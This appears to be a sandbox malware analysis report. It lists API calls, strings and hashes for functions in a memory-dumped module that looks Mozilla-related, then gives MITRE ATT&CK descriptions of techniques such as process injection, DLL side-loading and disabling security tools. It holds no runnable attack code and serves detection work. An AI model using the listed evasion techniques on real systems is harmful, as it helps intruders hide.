Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C2C6E22
__Init_thread_footer.LIBCMT ref: 6C2C6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C2C6E1D

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: bc0baf972c3c11139b7222c5d32e6ef2e75188ffdda7d42e8b11a53a22bafed2
Instruction ID: 99d8f5e52f0fe3343cfec73a7f86b6b1551d5936c4a2d00601cf6ea422a8f7c4
Opcode Fuzzy Hash: bc0baf972c3c11139b7222c5d32e6ef2e75188ffdda7d42e8b11a53a22bafed2
Instruction Fuzzy Hash: 3AF05930706249CBDB808B68E8A8EB33771539F218F040266DC3466FD1D720A506CA93

Function 6C279E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C279EEF

Strings

NaN, xrefs: 6C279EC1
Infinity, xrefs: 6C279EB7

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 2611469bf18117a3ff64b7ae1ca6dbebd4e2580dce78a2ba1408b76c19c1f46d
Instruction ID: 6196e7b0ef332d4a810bc3e1ff91214ab52a719304a6beb6ffb9c49eaf938cf5
Opcode Fuzzy Hash: 2611469bf18117a3ff64b7ae1ca6dbebd4e2580dce78a2ba1408b76c19c1f46d
Instruction Fuzzy Hash: EAF0FF78A0234DCBDB008F08F84DB833B71B35F319F204A15CD042ABC0D3316596CAA2

Function 6C276C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0K*l,?,6C2A4B30,80000000,?,6C2A4AB7,?,6C2643CF,?,6C2642D2), ref: 6C276C42

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

moz_xmalloc.MOZGLUE(0K*l,?,6C2A4B30,80000000,?,6C2A4AB7,?,6C2643CF,?,6C2642D2), ref: 6C276C58

Strings

0K*l, xrefs: 6C276C33, 6C276C41, 6C276C57

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0K*l
API String ID: 1967447596-2261755079
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: db924f4d4a10ff6c5f858e1872a12a43e18102dd8305abc4df8d4e7a3b963bd0
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 0AE086F1A2070D4B9F189D789CCD96A79DC8B146A97184A3DEC22C6FC8FA74E5508171

Function 6C2C5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C2E51C8), ref: 6C2C591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C2C592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C2C5915

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 4431d34b6cfd0e85a6377d48e16d44088755deed77630f643691add839511dc1
Instruction ID: 1bf63a036bfb6e53bf47079f430cd2606088c4fa48ad2214ef350fb660bee385
Opcode Fuzzy Hash: 4431d34b6cfd0e85a6377d48e16d44088755deed77630f643691add839511dc1
Instruction Fuzzy Hash: 57E09A30204348ABCB408A68890C7467BF89B1A32AF5486A4FC68A3AD1C3B1A840D3D2

Function 6C273850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C2EF860), ref: 6C27385C
ReleaseSRWLockExclusive.KERNEL32(6C2EF860,?), ref: 6C273871

Strings

,.l, xrefs: 6C27387A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,.l
API String ID: 17069307-2898010928
Opcode ID: 8259c5a400ec014f735e9255e57aa20df6fc46556da39ead7f1a599a3e4ac023
Instruction ID: f2c6458671f88907ca380a4e4e83c5af8ac660719de8b4191c33ddbb8b293ac1
Opcode Fuzzy Hash: 8259c5a400ec014f735e9255e57aa20df6fc46556da39ead7f1a599a3e4ac023
Instruction Fuzzy Hash: 5BE0DF32901B2DD78722DFA7A40958B7B78FF4F7907468005FC093BA00C7309140C6EA

Function 6C27BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C27BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C27BEF5

Strings

cryptbase.dll, xrefs: 6C27BEF0

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 46dfb38adb8af8cf1170bedf09d0aa4592711d6ebe62fd80e437a15850c54375
Instruction ID: ba74d66190ed9ef4d34f2a53e9d49a36eeb6bae407fd87c49f527ad55be2cff5
Opcode Fuzzy Hash: 46dfb38adb8af8cf1170bedf09d0aa4592711d6ebe62fd80e437a15850c54375
Instruction Fuzzy Hash: A1D013311D430CE7D7516B918D4DF1537B49705715FD4C021FF5564991C7B19450CF94

Function 6C2650E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C264E9C,?,?,?,?,?), ref: 6C26510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C264E9C,?,?,?,?,?), ref: 6C265167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C265196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C264E9C), ref: 6C265234

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 284ebe04cb7b24c086ca55932dfac1ec10cad85fa07dc3f37e0f7fe3b8a2f1e0
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 0B91AE7550565ACFCB14CF0DC890A56BBA1FF89318B298698EC585BB16D331FC82CBE0

Function 6C2A08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE7DC), ref: 6C2A0918
LeaveCriticalSection.KERNEL32(6C2EE7DC), ref: 6C2A09A6
EnterCriticalSection.KERNEL32(6C2EE7DC,?,00000000), ref: 6C2A09F3
LeaveCriticalSection.KERNEL32(6C2EE7DC), ref: 6C2A0ACB

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2424c6fb1e35ae2a0caa2b6ecc18c7f9e604bd304a6b9d148d7cf85f9b7fbcf9
Instruction ID: 9ff643977a2199f23eaf901e72d2b18ecb986daac99e58761eb60d2432386cd4
Opcode Fuzzy Hash: 2424c6fb1e35ae2a0caa2b6ecc18c7f9e604bd304a6b9d148d7cf85f9b7fbcf9
Instruction Fuzzy Hash: D1514D3271165E8BEB04DA96C454B2573A1EB8AF24B254139DD67A7FC0D730E842C6C4

Function 6C2BB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C2BB2C9,?,?,?,6C2BB127,?,?,?,?,?,?,?,?,?,6C2BAE52), ref: 6C2BB628

Part of subcall function 6C2B90E0: free.MOZGLUE(?,00000000,?,?,6C2BDEDB), ref: 6C2B90FF
Part of subcall function 6C2B90E0: free.MOZGLUE(?,00000000,?,?,6C2BDEDB), ref: 6C2B9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C2BB2C9,?,?,?,6C2BB127,?,?,?,?,?,?,?,?,?,6C2BAE52), ref: 6C2BB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C2BB2C9,?,?,?,6C2BB127,?,?,?,?,?,?,?,?,?,6C2BAE52), ref: 6C2BB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C2BB127,?,?,?,?,?,?,?,?), ref: 6C2BB74D

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: b6b8afd3c78a731a652de023bfe36591317b39b04ba8bc903cab12f305a0f116
Instruction ID: 8d4b5636f2e0f4d85e9626379468be89b286340becb7966dcf44569b18bc59a8
Opcode Fuzzy Hash: b6b8afd3c78a731a652de023bfe36591317b39b04ba8bc903cab12f305a0f116
Instruction Fuzzy Hash: 2951EC72A0121A8FDB14CF58C9C466EB7B5FF85389F058529DC5ABB700DB30AC04CBA1

Function 6C2BDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C2AFF2A), ref: 6C2BDFFD

Part of subcall function 6C2B90E0: free.MOZGLUE(?,00000000,?,?,6C2BDEDB), ref: 6C2B90FF
Part of subcall function 6C2B90E0: free.MOZGLUE(?,00000000,?,?,6C2BDEDB), ref: 6C2B9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2AFF2A), ref: 6C2BE04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2AFF2A), ref: 6C2BE0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C2AFF2A), ref: 6C2BE0FE

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: a725766f9e3d950e10e84e8642accc659b21c3711b84b0c495e7c3e89588f261
Instruction ID: c21fb192b19ce5c7765ad4d212e6f64ab84df5373cbccaff017d40081153bab1
Opcode Fuzzy Hash: a725766f9e3d950e10e84e8642accc659b21c3711b84b0c495e7c3e89588f261
Instruction Fuzzy Hash: DC41C1B161420A8FEB14CF68C88075A77B6AB4534CF244979DD16FB740EB32E944CBD2

Function 6C2B6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C2B6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C2B6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C2B6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B6F5C

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 8f31aeeab5f7c73778501259832b8cc58667a33a8d0b43d83de72bd34185ef38
Instruction ID: 183156c79c426eb970fcfb8fda3add56fb11d8d5b96246931dcf2ef2795aea30
Opcode Fuzzy Hash: 8f31aeeab5f7c73778501259832b8cc58667a33a8d0b43d83de72bd34185ef38
Instruction Fuzzy Hash: 4C31F871A1060A8FDB08CF2CC980AAA73E9FB84349F50413DE82AE7651EF31E559C790

Function 6C2CB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C270A4D), ref: 6C2CB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C270A4D), ref: 6C2CB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C270A4D), ref: 6C2CB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C270A4D), ref: 6C2CB67F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 78efad644ea4300a3d89d38a695161238b4cfce4095b288d88527a37859c94bb
Instruction ID: ec0f62b1faf2cfa584bdecc2fdb062a84fc9db2206d286228441181a8f6d0a40
Opcode Fuzzy Hash: 78efad644ea4300a3d89d38a695161238b4cfce4095b288d88527a37859c94bb
Instruction Fuzzy Hash: A331F471E0021A8FDB54DF58C84465ABBB9FF84315F268629DC06EB241DB31E915CBE2

Function 6C29F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C29F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C29F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C29F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C29F668

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 706eea57d5778c9ea6e745856cb143132bfcb8aa5c4e12a345892384a784a2bd
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 2D313E71A00218AFC754CF5ACCC0E9B77B9EB84754B14853DFA598BB04D671F9448B90

Function 6C27B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C27B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C27B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C27B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C27B9B9

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: d5333aba0cd52313fd7ff521ce1434855a2c2913f15182415ec543a367424176
Instruction ID: 31d99548667fbacf4554da337370708f4c96637cecd081fadf3ed753de9e1cfc
Opcode Fuzzy Hash: d5333aba0cd52313fd7ff521ce1434855a2c2913f15182415ec543a367424176
Instruction Fuzzy Hash: 95114FB1A002099FCB54DF69D8848ABB7F8BF98314B14853AE929D3701D731A915CAA1

Function 6C2B26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B26C1
free.MOZGLUE(?), ref: 6C2B26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B26FF
free.MOZGLUE ref: 6C2B270D

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4a163537577d5bddf88e6f7401f4c5d460c135da86ae250e3e897cf6b9293eb3
Instruction ID: c968d3a097d0b0fca8cb1dd3251f5bd59e79fa35479dfee86862afcd49ea3295
Opcode Fuzzy Hash: 4a163537577d5bddf88e6f7401f4c5d460c135da86ae250e3e897cf6b9293eb3
Instruction Fuzzy Hash: CAF0D6F2B0130A5BEB009A58D88895773A9EB5529EB100035FE16E3B01E731F918C6A5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

